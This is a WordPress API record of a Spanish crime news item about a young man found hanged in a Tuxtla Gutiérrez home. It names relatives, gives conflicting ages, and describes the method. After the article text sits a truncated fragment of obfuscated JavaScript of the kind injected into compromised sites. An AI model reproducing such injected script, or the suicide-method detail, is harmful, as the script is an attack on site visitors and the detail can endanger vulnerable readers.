{"id":7146,"date":"2022-12-03T01:26:23","date_gmt":"2022-12-03T01:26:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7146"},"modified":"2022-12-03T01:26:24","modified_gmt":"2022-12-03T01:26:24","slug":"localizan-a-joven-sin-vida-en-vivienda-de-ampliacion-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7146","title":{"rendered":"Localizan a joven sin vida en vivienda de Ampliaci\u00f3n Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1670030711945.jpg\" alt=\"\" class=\"wp-image-7147\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1670030711945.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/12\/FB_IMG_1670030711945-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 2 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Un joven de 24 a\u00f1os de edad fue localizado sin vida la madrugada de este viernes al interior de un domicilio de la Colonia Ampliaci\u00f3n Ter\u00e1n de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este hecho se report\u00f3 por los propios familiares del hoy occiso.<\/p>\n\n\n\n<p>En el lugar informaron a la polic\u00eda que, al arribar al domicilio localizaron a Eduardo de 27 a\u00f1os de edad suspendido con un lazo del cuello sujeto a una escalera tipo caracol.<\/p>\n\n\n\n<p>Elivet, hermano del occiso pidi\u00f3 ayuda y los vecinos intervinieron para descolgarlo y ponerlo en el piso.<\/p>\n\n\n\n<p>Param\u00e9dicos de la Cruz Roja arribaron al domicilio localizado en la Primera Sur, entre Octava y Novena Oriente para realizar el diagn\u00f3stico y determinaron que ya hab\u00eda muerto desde horas antes.<\/p>\n\n\n\n<p>Peritos de la Fiscal\u00eda General del Estado arribaron al lugar para realizar las diligencias correspondientes levantar el cuerpo y trasladarlo al SEMEFO donde se practicar\u00eda la necropsia de ley.<\/p>\n\n\n\n<p>En el lugar vecinos informaron que posiblemente el joven tom\u00f3 la fatal decisi\u00f3n por problemas personales.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 2 de diciembre del 2022. Tuxtla Guti\u00e9rrez.- Un joven de 24 a\u00f1os de edad fue localizado sin vida la madrugada de este viernes al interior de un domicilio de la Colonia Ampliaci\u00f3n Ter\u00e1n de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales, este hecho se report\u00f3 por los propios familiares del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7147,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7146","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7146","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7146"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7146\/revisions"}],"predecessor-version":[{"id":7148,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7146\/revisions\/7148"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7147"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7146"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7146"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7146"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}